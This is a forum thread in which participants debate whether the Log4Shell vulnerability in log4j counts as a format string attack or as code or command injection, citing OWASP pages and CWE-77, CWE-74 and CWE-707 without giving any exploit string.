Part of the problem is (AIUI) that expansion of ${} type constructs is carried out after parameters are inserted into the log message's format string. I don't believe the use case requires that, i think it was just easier to implement. If that expansion was done on the format string, before parameters were inserted, this attack would not be possible. Injecting dodgy strings into log messages as archi42 suggests would also not be a problem if the insertion was done safely.
Agreed that this is not a sanitisation attack, but i think that means it is a format string attack:
Hah, linking to OWASP is a good point. I have now put some more thought into "how would I EXACTLY classify this, if I had to list it as a finding for a customer".
Now, I think format string is not entirely right, either. That's more related to `printf`, which splits code (the format string) and data (the varargs). But log4j actually mixes code and data into one string. In the OWASP frame work, I think the more generic variant of format string attacks would be https://owasp.org/www-community/attacks/Code_Injection (that's actually linked under "related" for the format string attacks).
OWASP lives mostly in the web world, but links to CWE-77 (Command Injection, https://cwe.mitre.org/data/definitions/77.html), which is pretty generic. And log4shell matches the description just nice: 1. Data from untrusted source: yes; 2. data is part of a string that's executed: interpreted, which I think qualifies as a yes; 3. the execution gives capabilities the attacker would not have other wise: oh yes!
So it's probably safe to claim that this could fall under CWE-77 (too bad CVEs rarely use CWEs).
Now, CWE-77 (Command Injection) is a child of "CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')" https://cwe.mitre.org/data/definitions/74.html. Which states "The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities." - that's probably why the both of us thought of the the two of these! :) And even if CWE-77 is to specialized (this could be argued) CWE-74 should be a good match, quoting CWE-74: "The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component" [end quote].
Funnily, CWE-74 is a child of https://cwe.mitre.org/data/definitions/707.html - "Improper Neutralization". Which says neutralization can be done by (among others): "[...] transformation of the input/output to be "safe" using techniques such as filtering, encoding/decoding, escaping/unescaping, quoting/unquoting, or canonicalization [...]"
Agreed that this is not a sanitisation attack, but i think that means it is a format string attack:
https://owasp.org/www-community/attacks/Format_string_attack
It requires a couple of other loopholes, related to JNDI, to work, but that is the first step which goes wrong.